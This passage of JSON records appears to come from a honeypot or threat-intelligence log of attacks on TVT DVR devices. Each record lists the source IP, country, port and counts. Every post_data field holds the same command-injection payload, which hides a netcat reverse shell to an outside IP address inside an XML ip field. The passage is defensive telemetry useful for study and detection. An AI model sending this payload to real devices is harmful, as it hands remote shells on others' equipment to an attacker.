- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-21T18:25:29Z",
- "last_seen": "2019-12-21T18:25:29Z"
- },
- {
- "source_ip_address": "123.195.84.191",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T18:16:16Z",
- "last_seen": "2019-12-21T18:16:16Z"
- },
- {
- "source_ip_address": "219.85.141.44",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T18:03:45Z",
- "last_seen": "2019-12-21T18:03:45Z"
- },
- {
- "source_ip_address": "196.202.49.56",
- "country": "EG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T17:52:49Z",
- "last_seen": "2019-12-21T17:52:49Z"
- },
- {
- "source_ip_address": "221.146.69.105",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-21T17:52:24Z",
- "last_seen": "2019-12-21T17:52:24Z"
- },
- {
- "source_ip_address": "87.168.215.116",
- "country": "DE",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 39,
- "first_seen": "2019-12-21T17:47:17Z",
- "last_seen": "2019-12-21T17:47:17Z"
- },
- {
- "source_ip_address": "177.33.185.100",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T17:37:22Z",
- "last_seen": "2019-12-21T17:37:22Z"
- },
- {
- "source_ip_address": "94.49.205.100",
- "country": "SA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T17:36:13Z",
- "last_seen": "2019-12-21T17:36:13Z"
- },
- {
- "source_ip_address": "119.160.166.31",
- "country": "BN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T17:26:53Z",
- "last_seen": "2019-12-21T17:26:53Z"
- },
- {
- "source_ip_address": "81.213.108.171",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-21T17:07:56Z",
- "last_seen": "2019-12-21T17:07:56Z"
- },
- {
- "source_ip_address": "91.19.30.149",
- "country": "DE",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T17:07:12Z",
- "last_seen": "2019-12-21T17:07:12Z"
- },
- {
- "source_ip_address": "122.117.219.228",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T17:06:33Z",
- "last_seen": "2019-12-21T17:06:33Z"
- },
- {
- "source_ip_address": "84.90.248.200",
- "country": "PT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T16:48:48Z",
- "last_seen": "2019-12-21T16:48:48Z"
- },
- {
- "source_ip_address": "69.255.77.204",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 46,
- "first_seen": "2019-12-21T16:34:32Z",
- "last_seen": "2019-12-21T16:34:32Z"
- },
- {
- "source_ip_address": "219.85.55.62",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T16:17:40Z",
- "last_seen": "2019-12-21T16:17:40Z"
- },
- {
- "source_ip_address": "122.117.53.150",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-12-21T16:03:55Z",
- "last_seen": "2019-12-21T16:03:55Z"
- },
- {
- "source_ip_address": "159.148.159.138",
- "country": "LV",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T15:56:42Z",
- "last_seen": "2019-12-21T15:56:42Z"
- },
- {
- "source_ip_address": "96.87.176.122",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T15:50:17Z",
- "last_seen": "2019-12-21T15:50:17Z"
- },
- {
- "source_ip_address": "221.146.69.105",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 55,
- "first_seen": "2019-12-21T15:02:23Z",
- "last_seen": "2019-12-21T15:02:23Z"
- },
- {
- "source_ip_address": "27.254.224.116",
- "country": "TH",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T15:01:29Z",
- "last_seen": "2019-12-21T15:01:29Z"
- },
- {
- "source_ip_address": "95.168.97.121",
- "country": "HR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T14:59:21Z",
- "last_seen": "2019-12-21T14:59:21Z"
- },
- {
- "source_ip_address": "114.33.24.233",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-12-21T14:59:08Z",
- "last_seen": "2019-12-21T14:59:08Z"
- },
- {
- "source_ip_address": "78.185.19.44",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T14:46:19Z",
- "last_seen": "2019-12-21T14:46:19Z"
- },
- {
- "source_ip_address": "189.230.58.78",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T14:33:13Z",
- "last_seen": "2019-12-21T14:33:13Z"
- },
- {
- "source_ip_address": "47.6.89.99",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T14:21:25Z",
- "last_seen": "2019-12-21T14:21:25Z"
- },
- {
- "source_ip_address": "93.140.85.40",
- "country": "HR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T14:19:20Z",
- "last_seen": "2019-12-21T14:19:20Z"
- },
- {
- "source_ip_address": "220.134.71.223",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-21T14:06:14Z",
- "last_seen": "2019-12-21T14:06:14Z"
- },
- {
- "source_ip_address": "200.207.222.98",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
